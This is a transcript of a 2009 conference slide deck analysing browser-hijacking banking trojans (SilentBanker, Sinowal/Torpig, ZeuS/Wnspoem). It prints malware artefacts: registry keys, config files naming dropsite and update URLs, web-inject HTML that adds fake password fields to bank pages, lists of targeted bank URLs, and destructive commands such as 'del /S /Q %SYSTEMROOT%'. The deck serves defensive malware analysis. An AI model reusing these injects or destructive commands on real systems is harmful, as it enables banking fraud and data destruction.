Common Browser Hijacking Methods - TERENA · 2009-05-20 · Browser Hijacking is actively used in...
Transcript of Common Browser Hijacking Methods - TERENA · 2009-05-20 · Browser Hijacking is actively used in...
*[ Common Browser Hijacking Methods]
David BarrosoTERENA Meeting, León
2
Agenda
Examples: SilentBanker, Sinowal, Wnspoem
Browser Hijacking
Summary
Kill the Operating System
Browser Hijacking
Definition
“Browser hijacking is the modification of a web browser’s settings by malicious code. The term ‘hijacking’ is used as the changes are performed without the user’s permission” (Wikipedia)Additionally, the malicious code can modify the HTML rendered in the browser in order to lure the user
4
Why are they asking for so many data?
5
Examples
7
SilentBanker
Date: 2007Method: Browser Helper ObjectTechnique: Real time HTML injection and HTML forwardingInfection: drive-by exploitsMisc: more than 75 mutations
SilentBanker: Flow Diagram
8
SilentBanker: BHO Installation
9
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}]@="Microsoft Shared Library Object Version"
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\InprocServer32]@="C:\\WINDOWS\\system32\\mfc42dx1.dll""ThreadingModel"="Apartment"
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\ProgID]@="SharedObject.SharedObjectVersion.1"
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\TypeLib]@="{5F226421-415D-408D-9A09-0DCD94E25B48}"
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\VersionIndependentProgID]@="SharedObject.SharedObjectVersion"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0000AC13-3487-1583-C4BE-BE6A839DB000}]
SilentBanker: Configuration File
10
Get X.Y.67.30/~ipcount/ww6/getcfg.php?id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=10&v=21&b=6&z=12705442
SilentBanker: Configuration File
The encrypted configuration file includes:• Additional configuration sources• Dropsite URL• Update URL• Data encryption key
11
[dfgdf]Bg1=X.Y.67.30/~ipcount/ww6/getcfg.phpBg2=A.B.100.103/ww6/getcfg.php
[nbmx]Bg1=X.Y.67.30/~ipcount/ww6/data.phpBg2=A.B.100.103/ww6/data.php
[kjew]Bg1=X.Y.67.30/~ipcount/ww6/file.exeBg2=A.B.100.103/ww6/file.exe
[sdfs]secd=08000000B7B613F1F56F5BC7EDAEDEEFD2ABB1D38B2BA1014A585…
SilentBanker: Injection Configuration
12
Get X.Y.67.30/~ipcount/ww6/getcfg.php?id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=20&v=21&b=6&z=12705442
[jhw18]pok=insertqas=passport.yandex.ru/passportnjd=3ECFE0F0EEEBFC3A3C28dfr=9xzn=3C2367653E69xzq=5rek=202020203C676520696E797674612122676263223E0D0A202020203223ECFEBE0F2E5E6EDFBE920EFE0F0EEEBFC3A3C2367713E0D0A202020203C6771206A767167752122292431222070796E666621227661636867223E0D0A202020203C766163686720676C63722122636E66666A6265712220616E7A722122636E66666…req=331
pok Actionqas Target URLnjd Begin replacement tokendfr Number of characters in njd -1xzn End replacement tokenxzq Number of characters in xzn -1rek HTML code injectedreq Number of characters in rek -1
insert insert injected HTML code between tokensdelete delete HTML code in xznreplace replace HTML code in xznsubreq substitute xzn with rekgrab extract field in xzn
pok Actionqas Target URLnjd Begin replacement tokendfr Number of characters in njd -1xzn End replacement tokenxzq Number of characters in xzn -1rek HTML code injectedreq Number of characters in rek -1
insert insert injected HTML code between tokensdelete delete HTML code in xznreplace replace HTML code in xznsubreq substitute xzn with rekgrab extract field in xzn
SilentBanker: Injection Configuration
13
<ge inyvta!"gbc"><gq jvqgu!".1"><qvi fglyr!"jvqgu: ($ck;"><oe #><#qvi><#gq><gq jvqgu!"%+1" pynff!"ynory">Ïëàòåæíûé ïàðîëü:<#gq><gq jvqgu!")$1" pynff!"vachg"><vachg glcr!"cnffjbeq" anzr!"cnffjq&" inyhr!"" fglyr!"jvqgu:)$1"
gnovaqrk!"&">2aofc;2aofc;<oe#> <#gq><gq jvqgu!"&)1"><oe><#gq><#ge>
<tr valign="top"><td width="8%"><div style="width: 40px;"><br /></div></td><td width="17%" class="label">Ïëàòåæíûé ïàðîëü:</td><td width="50%" class="input"><input type="password" name="passwd2" value="" style="width:50%" tabindex="2
<br/> </td><td width="25%"><br></td></tr>
ROT-13 Algorithm
SilentBanker: Original Webpage
14
SilentBanker: Modified Webpage
15
16
Sinowal/Anserin/Torpig
Date: 2005Method: Code InjectionTechnique: Real time HTML injection and HTML forwardingInfection: drive-by exploits and emailMisc: infects Master Boot Record (MBR) to be stealth
Sinowal: Injection
Sinowal does not have a configuration file with details about all the injectionsEach time the user connects to a specific sites, Sinowal asks its injection server for instructions
17
Sinowal: Injection Example
18
GET host/Key/EncryptedDataGET host/EFAAC5AEB85FF1D1/MGJmlWUXX1Rkf8V+6n7wFFFiJsXRwhy1
Tell me the fake page pathTell me the fake page path This is the targeted
brandThis is the targeted brand
I want the answer encryptedI want the answer encrypted
Sinowal: Injection Example
Step 3: The injection server looks for the targeted brand:UK online*.lloydstsb.* /miheld.ibc {www} /uk/lloyds/lloyds.php
2 0 4 USA onlineid.bankofamerica.com /cgi-
bin/sso.login.controller* {www} /usa/bofa_pers/sso.login.php 2 0 3
ES www*.bancopopular.es /Bpemotor {www} /spain/bancopopular/bancopopular.php 2 0 2
19
Sinowal: Injection Example
Step 4: the injection server answerswww*.bancopopular.es /Bpemotor /spain/bancopopular/bancopopular.php 2 0 5 1
20
This is the fake page pathThis is the fake page path
2: You need a GET2: You need a GET0: Number of visits to the real URL0: Number of visits to the real URL
5: number of injection attempts5: number of injection attempts
1: Injection enabled1: Injection enabled
Sinowal: Targeted URLs
HTTP Forwarding (Web Injects)• UK: 40• DE: 47• US: 65• ES: 30• IT: 18• AT: 7• TR: 44
• PL: 7• AU: 26• SK: 5• NZ: 8• NL: 4• SG: 2
21
22
Wnspoem/PRG/ZeuS/Ntos
Date: 2006Method: Code InjectionTechnique: Real time HTML injection and HTML forwardingInfection: drive-by exploits
Version 1 Version 2 Version 3 Version 4Directory wnspoem sysproc64 twain_32 lowsecFilename ntos.exe oembios.exe twext.exe sdra64.exeStolen data audio.dll sysproc86.sys local.ds local.dsConfiguration
video.dll sysproc32.sys user.ds user.ds
Wnspoem: Famous Screenshots
23
Wnspoem: Flow Diagram
24
Wnspoem: Hooks
Wsock32.dll (FTP/POP3 capture)• Send• Sendto• Closesocket
Ws2_32.dll (FTP/POP3)• Send• Sendto• WSASend• WSASendTo• Closesocket
User32.dll (Keylogger)• GetMessage• PeekMesasge• GetClipboardData
Crypt32.dll (Certificates)• PFXImportCertStore
Wininet.dll (Capture data, inject HTML)
• HTTPSendRequest• InternetReadFile• InternetReadFileEx• InternetQueryDataAvailable• InternetCloseHandle• HTTPQueryInfo
Ntdll.dll (Infect processes and hide files)
• NtCreateThread• LdrLoadDll• LdrGetProcedureAddress• NtQueryDirectoryFile
25
Wnspoem: Configuration File
set_url https://www.gruposantander.es/bog/sbi*?ptns=acceso* GPdata_beforename="password"*</td>*</td>data_enddata_inject<td align="left" colspan="7" valign="bottom"></td></tr><tr><td class="textoHome" align="left">3. Clave de Transferencias</td><td width="20"><img src='/img4bog/px.gif' border='0' width="20" height="1"></td><td align="left"><input type="password" name="ESpass" maxlength="60" tabindex="3" class="TextoContenido"></td>data_enddata_afterdata_end
26
Configuration files in latest wnspoem version uses RC4 and 256-bits keys
Wnspoem: Original Webpage
27
Wnspoem: Modified Webpage
28
Wnspoem: HTTP Forwarding
Some banks use security tokens or more complex 2nd authentication than a passwordIn this scenario, HTML injection is avoided, and the user is forwarded to a fake webpage usually hosted in a compromised site
29
Wnspoem: HTTP Forwarding
In the configuration file:
@https://*.barclays.co.uk/* https://*.barclays.co.uk/* http://compromisedhost.com/img/commons/barclay/index.ph
p @https://*.cajasur.es/*https://*.cajasur.es/*http://compromisedhost.com/img/commons/cajasur/index.ph
p
30
Wnspoem: Fake Webpage
31
Wnspoem: Statistics
Analysis and Statistics: Configuration files750 configuration files (usually cfg.bin) analyzed.Only wnspoem version 1, 2 and 3
32
Wnspoem: Top 10 TLD
33
Wnspoem: Targeted Brands
34
Wnspoem: Malicious Domains
35
Wnspoem: Malicious IP Addresses
36
Kill the Operating System
Kill the Operating System
It is getting more common that just after stealing the credentials, the operating system is remotely destroyedThis action makes the analysis more difficult, since cannot be done remotely.The malicious code is not securely deleted in the system and can be recoveredOne optimistic result is that the machine will be reformated with a new and patched operating system.
38
Kill the Operating System
Nethell:• Deletes NTDETECT.COM and ntldr
InfoStealer:• Deletes \drivers\*.sys• Deletes some registry keys (HKLM\Microsoft\Windows
NT\CurrentVersion\Winlogon: Shell = Explorer.exeWnspoem:• Deletes HKCU, HKLM\Software and HKLM\System
Glacial Dracon:• del /A:S /Q /F C:\\*.*• del /S /Q %SYSTEMROOT% %PROGRAMFILES%
39
Summary
Summary
Browser Hijacking is actively used in fraud schemesTargeted brands are all around the worldCurrently, only Microsoft Windows users are affected (Internet Explorer and Firefox)Be suspicious if your browser is asking for too much informationBe more suspicious if your computer stops working just after your browsing is asking for too much information ☺
41
ThanksDavid BarrosoS21sec e-crime [email protected]://blog.s21sec.com
lostinsecurity
*[ MUCHAS GRACIAS ]
Pág. 43